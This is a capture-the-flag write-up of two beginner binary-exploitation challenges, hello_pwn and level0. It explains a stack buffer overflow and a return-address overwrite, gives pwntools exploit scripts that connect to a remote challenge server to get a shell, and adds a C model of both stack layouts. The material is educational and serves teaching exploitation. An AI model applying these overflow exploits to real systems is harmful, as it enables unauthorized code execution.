xctf-hello_pwn
Topic Portal: https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5052
This is a stack overflow with the same idea as yesterday's challenge. The target is at:
The input buffer and dword_60106C are only 4 bytes apart, so overflowing the buffer changes dword_60106C to the value being compared against ("NUAA"). Note: the target is little-endian, so the bytes written into memory must be the reverse order, i.e. 'aaun'.
exp:
from pwn import *
# cnn = process('./hello_pwn')
cnn = remote('111.198.29.45', 32280)
payload = b'a' * 4 + b'aaun'   # 4 bytes to reach dword_60106C, then the value in little-endian byte order
cnn.recvuntil(b'bof')
cnn.send(payload)
print(cnn.recv())
cnn.interactive()
Summary: mind the little-endian byte order when writing a value into memory.
xctf-level0
Topic Portal: https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5053
Load the binary into IDA and press F5: main prints "Hello world" and then calls vulnerable_function(). Following it:
There is a read() into buf, which is 0x80 bytes long, and read() does not limit the length. Whatever is written past 0x80 bytes lands on the saved frame pointer and the return address, so we control where the function returns.
Looking at the disassembly: if the return address is overwritten with the address of callsystem during that read(), the exploit works.
From the leave instruction we know: leave is equivalent to mov esp, ebp; pop ebp.
retn is equivalent to pop eip. So after buf we need 8 bytes to fill the slot that leave pops (the binary is 64-bit, so the registers are really rsp/rbp/rip and each slot is 8 bytes), and the next 8 bytes are what retn pops into rip.
So the payload is: 'a' * 0x80 + 'a' * 8 + (callsystem address), where callsystem is at 0x400596:
So you can get exp:
from pwn import *
# cnn = process('./level0')
cnn = remote('111.198.29.45', 35563)
payload = b'a' * 0x88 + p64(0x400596)   # 0x80 bytes of buf + 8 bytes of saved rbp, then the new return address
cnn.sendline(payload)
cnn.interactive()
We get a shell; ls shows the files and cat flag prints the flag:
To sum up:
enter instruction: enter is equivalent to push ebp; mov ebp, esp (save the caller's ebp, then set ebp to the current esp). These are the standard two steps at the start of a function.
leave instruction: leave is equivalent to mov esp, ebp; pop ebp.
call instruction: call foo (foo is a label or address) is equivalent to push eip; mov eip, foo.
ret instruction: ret is equivalent to pop eip.
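The two overflows above differ only in what sits past the end of the buffer: in hello_pwn it is the checked dword, in level0 it is the saved rbp and the return address. The C program below is an added illustration (not part of this writeup, and not the challenge binaries): it models each stack layout as a struct, copies the payload in unbounded the way read() does, and reads back what landed in the overwritten slot. The little-endian packing helpers play the role of pwntools' p32()/p64(); the address 0x400596 and the 'aaun' value are the ones used in the exploits above, and the assumption that no padding sits between the fields holds on x86-64.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Little-endian packing, the same thing pwntools' p32()/p64() do. */
static void p32(uint8_t *out, uint32_t v) {
    for (int i = 0; i < 4; i++) out[i] = (uint8_t)(v >> (8 * i));
}
static void p64(uint8_t *out, uint64_t v) {
    for (int i = 0; i < 8; i++) out[i] = (uint8_t)(v >> (8 * i));
}

/* hello_pwn model: 4-byte input buffer, then the compared dword (dword_60106C).
 * Assumption: no padding between char[4] and uint32_t, true on x86-64. */
struct hello_frame {
    char     buf[4];
    uint32_t target;
};

/* Copy at most 8 payload bytes over the frame and return the dword that ends
 * up in target.  The host is little-endian, so the bytes 'a','a','u','n'
 * read back as 0x6E756161, i.e. "nuaa" when printed as a number. */
uint32_t hello_pwn_target(const char *payload) {
    struct hello_frame f;
    size_t len = strlen(payload);
    memset(&f, 0, sizeof f);
    if (len > sizeof f) len = sizeof f;
    memcpy(&f, payload, len);          /* unbounded read() modelled as memcpy */
    return f.target;
}

/* level0 model: 0x80-byte buf, the saved rbp that `leave` pops, then the
 * return address that `ret` pops into rip. */
struct level0_frame {
    uint8_t  buf[0x80];
    uint64_t saved_rbp;
    uint64_t ret_addr;
};

/* Build the same payload as the exploit: 0x88 filler bytes + p64(callsystem). */
size_t build_level0_payload(uint8_t *out, uint64_t callsystem) {
    memset(out, 'a', 0x80);            /* fill buf */
    memset(out + 0x80, 'a', 8);        /* saved rbp slot; junk is fine, leave just pops it */
    p64(out + 0x88, callsystem);       /* ret pops this into rip */
    return 0x90;
}

/* Feed the payload to the modelled frame and return what `ret` would jump to. */
uint64_t level0_rip_after_ret(uint64_t callsystem) {
    uint8_t payload[sizeof(struct level0_frame)];
    struct level0_frame f;
    size_t n = build_level0_payload(payload, callsystem);
    memset(&f, 0, sizeof f);
    memcpy(&f, payload, n);            /* read(0, buf, 0x200) with no bound check */
    return f.ret_addr;
}

int main(void) {
    /* Packing the number 0x6E756161 ("nuaa") gives the byte string "aaun". */
    uint8_t le[4];
    p32(le, 0x6E756161u);
    printf("p32(0x6E756161) = %.4s\n", (const char *)le);

    printf("hello_pwn target with 'aaun': 0x%08x\n", hello_pwn_target("aaaaaaun"));
    printf("hello_pwn target with 'nuaa': 0x%08x (wrong byte order)\n",
           hello_pwn_target("aaaanuaa"));
    printf("level0 rip after ret: 0x%llx\n",
           (unsigned long long)level0_rip_after_ret(0x400596));
    return 0;
}
```

Running it shows that 'aaun' is what produces the dword 0x6E756161 the hello_pwn check wants, while 'nuaa' produces 0x6161756E, and that the 0x88-byte offset puts 0x400596 exactly in the slot that ret pops.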